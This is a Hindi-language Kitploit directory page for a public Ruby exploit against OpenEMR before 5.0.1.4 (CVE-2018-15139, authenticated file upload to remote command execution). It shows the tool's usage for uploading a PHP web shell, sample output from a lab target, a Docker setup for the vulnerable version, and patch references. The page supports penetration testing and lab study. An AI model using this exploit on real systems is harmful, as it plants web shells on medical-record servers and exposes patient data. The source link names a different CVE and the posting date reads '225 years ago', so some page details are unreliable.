Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
exploit-CVE-2018-15139 — OpenEMR < 5.0.1.4 - (प्रमाणित) फ़ाइल अपलोड - दूरस्थ कमांड निष्पादन | Kitploit
उपकरण/GitHubGitHub/sec-it/exploit-cve-2018-15139
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubsec-it/exploit-cve-2018-15139

exploit-CVE-2018-15139

OpenEMR < 5.0.1.4 - (प्रमाणित) फ़ाइल अपलोड - दूरस्थ कमांड निष्पादन

रिपॉजिटरी देखें
225 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

OpenEMR CVE-2018-15139 शोषण

OpenEMR < 5.0.1.4 - (प्रमाणित) फ़ाइल अपलोड - दूरस्थ कमांड निष्पादन

CVE-2018-15139 के लिए शोषण।

उपयोग

root@kitploit:~
$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution

Source: https://github.com/sec-it/exploit-CVE-2019-14530

Usage:
  exploit.rb exploit <url> <filename> <username> <password> [--debug]
  exploit.rb -h | --help

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <filename>  Filename of the shell to be uploaded
  <username>  Username of the admin
  <password>  Password of the admin
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb exploit http://example.org/openemr shell.php admin pass
  exploit.rb exploit https://example.org:5000/ shell.php admin pass

उदाहरण

root@kitploit:~
$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php

आवश्यकताएँ

  • httpx
  • docopt.rb

gem का उपयोग करते हुए उदाहरण:

root@kitploit:~
bundle install
# or
gem install httpx docopt

कमजोर सॉफ्टवेयर की Docker तैनाती

चेतावनी: यह सेटअप निश्चित रूप से उत्पादन उपयोग के लिए उपयुक्त नहीं है!

root@kitploit:~
$ sudo docker-compose up

आधिकारिक OpenEMR Docker छवि में अपलोड फ़ोल्डर अनुमतियाँ खराब हैं, इसलिए कंटेनर से कनेक्ट करना और अनुमतियों को ठीक करना आवश्यक है, जैसे:

root@kitploit:~
$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/

संदर्भ

  • लक्ष्य सॉफ्टवेयर: OpenEMR
    • होमपेज: https://www.open-emr.org/
    • स्रोत: https://github.com/openemr/openemr
    • Docker: देखें docker-compose.yml
    • कमजोर संस्करण: < 5.0.1.4 (अर्थात 5.0.1.3 तक)
    • पैच: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485

यह EDB-49998 का बेहतर पुनर्लेखन है।

यह कमजोरी Project Insecurity द्वारा पाई गई थी।

मूल शोषण और कमजोरी का विश्लेषण:

  • Project Insecurity द्वारा उजागर की गई गंभीर कमजोरियों को OpenEMR ने पैच किया
टूल डाउनलोड करें